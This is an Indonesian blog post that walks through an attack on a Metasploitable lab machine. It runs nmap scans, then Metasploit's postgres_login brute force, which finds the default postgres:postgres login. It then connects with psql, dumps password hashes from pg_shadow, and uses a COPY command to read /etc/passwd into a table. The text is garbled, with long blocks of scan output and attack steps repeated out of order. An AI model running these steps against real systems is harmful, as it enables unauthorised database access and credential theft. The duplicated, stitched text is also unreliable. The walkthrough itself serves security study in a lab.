Oke, langsung saja ke modulnya. Let's kicking ass!!!
root@bt:~# nmap 192.168.223.1-255
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-11-20 21:38 WIT
Nmap scan report for 192.168.223.1
Host is up (0.0000080s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
443/tcp open https
902/tcp open iss-realsecure
Nmap scan report for 192.168.223.128
Host is up (0.00090s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:72:06:C5 (VMware)
Nmap scan report for 192.168.223.254
Host is up (0.000052s latency).
All 1000 scanned ports on 192.168.223.254 are filtered
MAC Address: 00:50:56:E9:C3:C6 (VMware)
Nmap done: 255 IP addresses (3 hosts up) scanned in 10.44 seconds
[screenshot]
Terlihat dari hasil scan, kita memiliki korban yang membuka port 5432 untuk postgresql. Lalu gunakan nmap untuk mencari tau lebih jauh tentang vulnerabilitas yang mungkin ada.
root@bt:~# nmap -sS -sV -p 1-65535 -vv 192.168.223.128
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-11-20 21:39 WIT
NSE: Loaded 11 scripts for scanning.
Initiating ARP Ping Scan at 21:39
Scanning 192.168.223.128 [1 port]
Completed ARP Ping Scan at 21:39, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:39
Completed Parallel DNS resolution of 1 host. at 21:39, 0.42s elapsed
Initiating SYN Stealth Scan at 21:39
Scanning 192.168.223.128 [65535 ports]
[snip...]
Nmap scan report for 192.168.223.128
Host is up (0.0018s latency).
Scanned at 2011-11-20 21:39:23 WIT for 16s
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
Host is up (0.0018s latency).
Scanned at 2011-11-20 21:39:23 WIT for 16s
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
[snip...]
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:72:06:C5 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
Raw packets sent: 65787 (2.895MB) | Rcvd: 65536 (2.621MB)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:72:06:C5 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
Raw packets sent: 65787 (2.895MB) | Rcvd: 65536 (2.621MB)
[screenshot]
Sudah dapat dipastikan kalau ternyata korban memang memiliki postgresql dengan versi 8.3 (=
Langsung saja buka metasploit. Lalu cari modul yang mampu menyerang postgresql.
root@bt:~# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 764 exploits - 404 auxiliary - 118 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r14291 updated today (2011.11.20)
msf > search postgres
Perintah ini berfungsi untuk mencari modul yang berkaitan dengan PostGre.
[screenshot]
Setelah itu gunakan modul: auxiliary/scanner/postgres/postgres_login
Lalu tampilkan option yang bisa digunakan dalam modul ini:
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options
kemudian, masukkan konfigurasinya:
msf auxiliary(postgres_login) > set RHOSTS 192.168.223.128
RHOSTS => 192.168.223.128
Perhatikan yang ada tanda + berwarna hijau. Metasploit telah berhasil menemukan login PostGre dengan:
[*] 192.168.223.128:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.223.128:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.223.128:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
Username = postgres
Password = postgres
Mari kita cek keberhasilannya dengan login ke PostgreSQL
Kemudian akan keluar:
Masukan password berdasarkan hasil dictionary attack metasploit, yaitu -> postgres
Lihat, kita sudah terkoneksi!
[screenshot]
Berhasil! Lalu selanjutnya apa? Mari kita coba mengambil semua password yang ada dalam sistem!
postgres=# \d pg_ ###TEKAN TAB DUA KALI###
Display all 152 possibilities? (y or n)
Maka akan muncul semua modul postgres ->
[screenshot]
Lihat, ada pg_catalog. dimana ada tanda "." di belakangnya yang memungkinkan untuk memasukkan relasi tabel lainnya. Kemudian kita lihat relasi antara pg_catalog dengan pg_shadow.
postgres=# \d pg_catalog.pg_shadow
View "pg_catalog.pg_shadow"
Column | Type | Modifiers
-------------+---------+-----------
usename | name |
usesysid | oid |
usecreatedb | boolean |
usesuper | boolean |
usecatupd | boolean |
passwd | text |
valuntil | abstime |
useconfig | text[] |
View definition:
SELECT pg_authid.rolname AS usename, pg_authid.oid AS usesysid, pg_authid.rolcreatedb AS usecreatedb, pg_authid.rolsuper AS usesuper, pg_authid.rolcatupdate AS usecatupd, pg_authid.rolpassword AS passwd, pg_authid.rolvaliduntil::abstime AS valuntil, pg_authid.rolconfig AS useconfig
FROM pg_authid
WHERE pg_authid.rolcanlogin;
[screnshot]
Untuk dumping:
postgres=# SELECT * FROM pg_shadow;
msf auxiliary(postgres_login) > set RHOSTS 192.168.223.128
RHOSTS => 192.168.223.128
Perhatikan yang ada tanda + berwarna hijau. Metasploit telah berhasil menemukan login PostGre dengan:
[*] 192.168.223.128:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.223.128:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.223.128:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
Username = postgres
Password = postgres
Mari kita cek keberhasilannya dengan login ke PostgreSQL
root@bt:~# psql -h 192.168.223.128 --username=postgres --password
Kemudian akan keluar:
Password for user postgres:
Masukan password berdasarkan hasil dictionary attack metasploit, yaitu -> postgres
psql (8.4.8, server 8.3.1)
WARNING: psql version 8.4, server version 8.3.
Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.
postgres=#
WARNING: psql version 8.4, server version 8.3.
Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.
postgres=#
Lihat, kita sudah terkoneksi!
[screenshot]
Berhasil! Lalu selanjutnya apa? Mari kita coba mengambil semua password yang ada dalam sistem!
postgres=# \d pg_ ###TEKAN TAB DUA KALI###
Display all 152 possibilities? (y or n)
Maka akan muncul semua modul postgres ->
[screenshot]
Lihat, ada pg_catalog. dimana ada tanda "." di belakangnya yang memungkinkan untuk memasukkan relasi tabel lainnya. Kemudian kita lihat relasi antara pg_catalog dengan pg_shadow.
postgres=# \d pg_catalog.pg_shadow
View "pg_catalog.pg_shadow"
Column | Type | Modifiers
-------------+---------+-----------
usename | name |
usesysid | oid |
usecreatedb | boolean |
usesuper | boolean |
usecatupd | boolean |
passwd | text |
valuntil | abstime |
useconfig | text[] |
View definition:
SELECT pg_authid.rolname AS usename, pg_authid.oid AS usesysid, pg_authid.rolcreatedb AS usecreatedb, pg_authid.rolsuper AS usesuper, pg_authid.rolcatupdate AS usecatupd, pg_authid.rolpassword AS passwd, pg_authid.rolvaliduntil::abstime AS valuntil, pg_authid.rolconfig AS useconfig
FROM pg_authid
WHERE pg_authid.rolcanlogin;
[screnshot]
Untuk dumping:
postgres=# SELECT * FROM pg_shadow;
[screenshot]
Lalu, masukkan query ini untuk melihat shadow secara keseluruhan:
Pertama, kita pilih dulu database yang ingin kita gunakan:
postgres=# SELECT current_database();
current_database
------------------
postgres
(1 row)
[screenshot]
Lalu kita buat tabel sendiri yang berisikan shadow password:
postgres=# CREATE TABLE bluedragon (input TEXT); COPY bluedragon FROM '/etc/passwd'; SELECT input FROM bluedragon;
Hasilnya:
SYNTAX:
Creative:
blue-dragon & red-dragon
0 comment:
Post a Comment